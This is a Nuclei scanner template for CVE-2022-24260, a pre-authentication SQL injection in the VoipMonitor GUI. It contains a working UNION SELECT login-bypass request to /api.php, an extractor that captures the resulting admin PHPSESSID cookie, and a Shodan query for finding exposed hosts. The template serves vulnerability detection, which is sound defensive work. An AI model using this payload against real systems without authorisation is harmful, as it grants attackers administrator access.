id: CVE-2022-24260 info: name: VoipMonitor - Pre-Auth SQL Injection author: gy741 severity: critical description: A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL injection vulnerability in the VoipMonitor application. reference: - https://kerbit.io/research/read/blog/3 - https://nvd.nist.gov/vuln/detail/CVE-2022-24260 - https://www.voipmonitor.org/changelog-gui?major=5 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-24260 cwe-id: CWE-89 epss-score: 0.42516 epss-percentile: 0.96921 cpe: cpe:2.3:a:voipmonitor:voipmonitor:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: voipmonitor product: voipmonitor shodan-query: http.title:"VoIPmonitor" tags: cve,cve2022,voipmonitor,sqli,unauth http: - raw: - | POST /api.php HTTP/1.1 Host: {{Hostname}} Accept: */* Content-Type: application/x-www-form-urlencoded module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; # matchers-condition: and matchers: - type: word words: - '"success":true' - '_vm_version' - '_debug' condition: and - type: status status: - 200 extractors: - type: kval kval: - PHPSESSID # digest: 4a0a00473045022100f969f8fba0269017e9f556159fc8d21513f07dce64374d0902e642485914c8ee02202a72ccb450b53f9359f88fc381fbdf9e2d071eeaa1ec106fa2ed0530c4cef1a5:922c64590222798bb761d5b6d8e72950